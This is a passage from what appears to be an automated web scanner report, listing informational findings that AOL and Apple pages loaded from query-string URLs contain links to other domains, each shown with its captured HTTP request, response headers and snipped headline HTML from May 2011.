Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614702632-Repeat%7C1367686702632%3B%20s_nrgvo%3DRepeat%7C1367686702634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:59:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-49.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2604
Set-Cookie: JSESSIONID=C1C7A81EEEE390BC7550ADA67D35FF85; Path=/aol
Content-Length: 2604

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl4 plid-60589 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl4_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl4|sec1_lnk1|60589" href="http://realestate.aol.com/blog/2011/05/04/personal-letter-lands-a-home-sale/"><img height="217" alt="The Larez family in a pool" width="386" src="http://o.aolcdn.com/hss/storage/adam/bf24920b004e4f94f1bc4d54ca23eaa5/my-next-move-386lvg050411.jpg"/></a>
...[SNIP]...

16.19. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/37fccabc05e29ee5afc453ef1961b7d3/girl-on-tire-swing-hyperactive-kids-386kk0502.jpg
http://www.everydayhealth.com/adhd-quiz/adhd-myths-and-facts.aspx?xid=aol_eh-adhd_3-_20100502
http://www.everydayhealth.com/arthritis/exercise.aspx?xid=aol_eh-arthritis_21-_20100502
http://www.everydayhealth.com/digestive-health/is-medication-causing-your-heartburn.aspx?xid=aol_eh-digest_9-_20100502
http://www.everydayhealth.com/menopause/the-optimal-menopause-diet.aspx?xid=aol_eh-meno_37-_20100502

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl9

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:03:13 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2663
Set-Cookie: JSESSIONID=0C6F14C2DC2CFF449830B109CA6F9B76; Path=/aol
Content-Length: 2663

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl10 plid-60284 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl10_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl10|sec1_lnk1|60284" href="http://www.everydayhealth.com/adhd-quiz/adhd-myths-and-facts.aspx?xid=aol_eh-adhd_3-_20100502"><img height="217" alt="Kid on Tire Swing" width="386" src="http://o.aolcdn.com/hss/storage/adam/37fccabc05e29ee5afc453ef1961b7d3/girl-on-tire-swing-hyperactive-kids-386kk0502.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl10_hdln" onclick=" " href="http://www.everydayhealth.com/adhd-quiz/adhd-myths-and-facts.aspx?xid=aol_eh-adhd_3-_20100502" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl10|sec1_lnk2|60284">Are All Children With ADHD Hyper?
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl10_cpy" href="http://www.everydayhealth.com/adhd-quiz/adhd-myths-and-facts.aspx?xid=aol_eh-adhd_3-_20100502" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl10|sec1_lnk3|60284">Truth about other common beliefs
</a>
...[SNIP]...
<li ><a name="om_dl10_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl10|sec3_lnk1|60284" href="http://www.everydayhealth.com/digestive-health/is-medication-causing-your-heartburn.aspx?xid=aol_eh-digest_9-_20100502">Real Reason You Have Heartburn?
</a>
...[SNIP]...
<li ><a name="om_dl10_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl10|sec3_lnk2|60284" href="http://www.everydayhealth.com/menopause/the-optimal-menopause-diet.aspx?xid=aol_eh-meno_37-_20100502">Foods to Make Menopause Easier
</a>
...[SNIP]...
<li ><a name="om_dl10_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl10|sec3_lnk3|60284" href="http://www.everydayhealth.com/arthritis/exercise.aspx?xid=aol_eh-arthritis_21-_20100502">Moves That May Relieve Joint Pain
</a>
...[SNIP]...

16.20. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/4e60d1b89f82902389aa73550195bdce/jennifer-anistons-house-sale-386lvg050311.jpg
http://www.diylife.com/2011/05/03/snake-a-drain/
http://www.shelterpop.com/2011/05/03/jennifer-aniston-home-la/
http://www.shelterpop.com/2011/05/04/green-decorating/
http://www.shelterpop.com/2011/05/04/home-evan-oliver-haslegrave/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=rr1~5~1304556981389~0; stips5=1; s_pers=%20s_getnr%3D1304575060472-Repeat%7C1367647060472%3B%20s_nrgvo%3DRepeat%7C1367647060473%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-43.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2376
Set-Cookie: JSESSIONID=D83438BF4B049481E906301797B76CFC; Path=/aol
Content-Length: 2376

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-60535 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl7|sec1_lnk1|60535" href="http://www.shelterpop.com/2011/05/03/jennifer-aniston-home-la/"><img height="217" alt="Jen Aniston Home" width="386" src="http://o.aolcdn.com/hss/storage/adam/4e60d1b89f82902389aa73550195bdce/jennifer-anistons-house-sale-386lvg050311.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" href="http://www.shelterpop.com/2011/05/03/jennifer-aniston-home-la/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl7|sec1_lnk2|60535">We Made Over Aniston's Home
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://www.shelterpop.com/2011/05/03/jennifer-aniston-home-la/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl7|sec1_lnk3|60535">Pics show mistakes she was making
</a>
...[SNIP]...
<li ><a name="om_dl7_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl7|sec3_lnk1|60535" href="http://www.shelterpop.com/2011/05/04/green-decorating/">Color Is Perfect for Spring Decor
</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl7|sec3_lnk2|60535" href="http://www.shelterpop.com/2011/05/04/home-evan-oliver-haslegrave/">Bookshelf Like You've Never Seen
</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl7|sec3_lnk3|60535" href="http://www.diylife.com/2011/05/03/snake-a-drain/">How to Tackle a Nasty Drain Clog
</a>
...[SNIP]...

16.21. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://i.huffpost.com/gen/273999/thumbs/a-MARIE-OSMOND-WEDDING-386x217.jpg
http://www.popeater.com/2011/05/04/mariah-carey-nick-cannon-baby-names-moroccan-monroe/
http://www.popeater.com/2011/05/04/marie-osmond-remarry-stephen-craig/
http://www.popeater.com/2011/05/04/neil-patrick-harris-tony-awards-host/
http://www.spinner.com/2011/05/03/decemberists-jenny-conlee-breast-cancer/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:35 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-46.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2444
Set-Cookie: JSESSIONID=C32A8A4C7E5DC5C5091D8C717570ECC7; Path=/aol
Content-Length: 2444

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-60523 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl2|sec1_lnk1|60523" href="http://www.popeater.com/2011/05/04/marie-osmond-remarry-stephen-craig/"><img height="217" alt="Marie Osmond and Stephen Craig" width="386" src="http://i.huffpost.com/gen/273999/thumbs/a-MARIE-OSMOND-WEDDING-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl2_hdln" href="http://www.popeater.com/2011/05/04/marie-osmond-remarry-stephen-craig/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl2|sec1_lnk2|60523">Marie Osmond Remarries First Husband
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl2_cpy" href="http://www.popeater.com/2011/05/04/marie-osmond-remarry-stephen-craig/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl2|sec1_lnk3|60523">More details about the couple's nuptials
</a>
...[SNIP]...
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl2|sec3_lnk1|60523" href="http://www.popeater.com/2011/05/04/mariah-carey-nick-cannon-baby-names-moroccan-monroe/">Mariah & Nick Reveal Baby Names
</a>
...[SNIP]...
<li ><a name="om_dl2_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl2|sec3_lnk2|60523" href="http://www.popeater.com/2011/05/04/neil-patrick-harris-tony-awards-host/">Actor Picked to Host Tony Awards?
</a>
...[SNIP]...
<li ><a name="om_dl2_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl2|sec3_lnk3|60523" href="http://www.spinner.com/2011/05/03/decemberists-jenny-conlee-breast-cancer/">Musician, 39, Diagnosed With Cancer
</a>
...[SNIP]...

16.22. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://aol.sportingnews.com/nba/story/2011-05-04/report-celtics-team-bus-robbed-in-miami-in-april
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter
http://aol.sportingnews.com/nfl/story/2011-05-04/willie-parker-calls-out-redskins-they-were-about-partying
http://o.aolcdn.com/hss/storage/adam/d73071bf1f5d4a1abaa210f17c3eb9ef/mendenhall-386cm050411.jpg
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~3~1304556981389~0; stips5=1; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2862
Set-Cookie: JSESSIONID=9215E915DD093CF30868FC885D4B3289; Path=/aol
Content-Length: 2862

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl4 plid-60545 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl4_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl4|sec1_lnk1|60545" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter"><span class="overlay"></span><img height="217" alt="Rashard Mendenhall" width="386" src="http://o.aolcdn.com/hss/storage/adam/d73071bf1f5d4a1abaa210f17c3eb9ef/mendenhall-386cm050411.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl4_hdln" onclick=" " href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl4|sec1_lnk2|60545">An NFL Star and His 9/11 Lesson</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl4_cpy" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl4|sec1_lnk3|60545">What today's athletes must remember
</a>
...[SNIP]...
<li ><a name="om_dl4_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl4|sec3_lnk1|60545" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/">Ex-NHL Player to Make MMA Debut</a>
...[SNIP]...
<li ><a name="om_dl4_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl4|sec3_lnk2|60545" href="http://aol.sportingnews.com/nfl/story/2011-05-04/willie-parker-calls-out-redskins-they-were-about-partying">Former NFL RB Rips Redskins Stars</a>
...[SNIP]...
<li ><a name="om_dl4_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl4|sec3_lnk3|60545" href="http://aol.sportingnews.com/nba/story/2011-05-04/report-celtics-team-bus-robbed-in-miami-in-april">Thieves Raid Boston Celtics Team Bus</a>
...[SNIP]...

16.23. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=12&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/3e43af495c5451bcd133636275a49d35/child-mickey-mouse-hat-disney-386nm050411.jpg
http://www.gadling.com/2011/05/03/gadlings-rankings-of-hotel-breakfast-buffet-foods/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=12&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; stips5=1; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575117715-Repeat%7C1367647117715%3B%20s_nrgvo%3DRepeat%7C1367647117717%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:48 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-27.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2580
Set-Cookie: JSESSIONID=051B842D95CDBCB1C5B287D000D393DF; Path=/aol
Content-Length: 2580

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl12 plid-60422 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
img" name="om_dl12_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl12|sec1_lnk1|60422" href="http://news.travel.aol.com/2011/05/03/walt-disney-world-3-awesome-days-outside-the-parks/"><img height="217" alt="Disney" width="386" src="http://o.aolcdn.com/hss/storage/adam/3e43af495c5451bcd133636275a49d35/child-mickey-mouse-hat-disney-386nm050411.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl12_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl12|sec3_lnk2|60422" href="http://www.gadling.com/2011/05/03/gadlings-rankings-of-hotel-breakfast-buffet-foods/">Hotel Breakfast Buffet Items to Avoid
</a>
...[SNIP]...

16.24. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://i.huffpost.com/gen/272816/thumbs/a-LUCIA-386x217.jpg
http://portal.aolcdn.com/p5/forms/673/06fae224-ec89-4d40-9623-2a3cda346ffe.gif
http://pr.atwola.com/promoclk/100001736x1223226161x1201733088/aol?redir=http:%2F%2Fdegrees.classesusa.com%2Fschools%2F%3Fsourceid%3Dlmb%2D24092%2D45432

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~6~1304556981389~0; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; stips5=1; s_pers=%20s_getnr%3D1304575074532-Repeat%7C1367647074532%3B%20s_nrgvo%3DRepeat%7C1367647074536%3B; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-35.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2179
Set-Cookie: JSESSIONID=F67A64AB2ABBCCD3483C261F0DE136F5; Path=/aol
Connection: close
Content-Length: 2179

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl8 plid-54848 display-lightbox">
<div id="advert">

...[SNIP]...
</span>
<a id="dlimg" name="om_dl8_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl8|sec1_lnk1|54848" href="http://pr.atwola.com/promoclk/100001736x1223226161x1201733088/aol?redir=http:%2F%2Fdegrees.classesusa.com%2Fschools%2F%3Fsourceid%3Dlmb%2D24092%2D45432"><span class="overlay">
...[SNIP]...
</b><img height="217" alt="Lucia" width="386" src="http://i.huffpost.com/gen/272816/thumbs/a-LUCIA-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl8_hdln" href="http://pr.atwola.com/promoclk/100001736x1223226161x1201733088/aol?redir=http:%2F%2Fdegrees.classesusa.com%2Fschools%2F%3Fsourceid%3Dlmb%2D24092%2D45432" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl8|sec1_lnk2|54848">Go Back to School
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl8_cpy" href="http://pr.atwola.com/promoclk/100001736x1223226161x1201733088/aol?redir=http:%2F%2Fdegrees.classesusa.com%2Fschools%2F%3Fsourceid%3Dlmb%2D24092%2D45432" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl8|sec1_lnk3|54848">See degrees now</a>
...[SNIP]...
<a id="dl-sponsorimg" class="icid-maing-grid7|main5|dl8|link4|54848"><img src="http://portal.aolcdn.com/p5/forms/673/06fae224-ec89-4d40-9623-2a3cda346ffe.gif"/></a>
...[SNIP]...

16.25. http://www.apple.com/itunes/affiliates/download/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apple.com
Path:	/itunes/affiliates/download/

Issue detail

The page was loaded from a URL containing a query string:

http://www.apple.com/itunes/affiliates/download/?id=281704577

The response contains the following link to another domain:

http://fls.doubleclick.net/activityi;src=1566767;type=itune088;cat=apple465;ord=1;num=1?

Request

GET /itunes/affiliates/download/?id=281704577 HTTP/1.1
Host: www.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/artist/aol-inc/id281704577
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
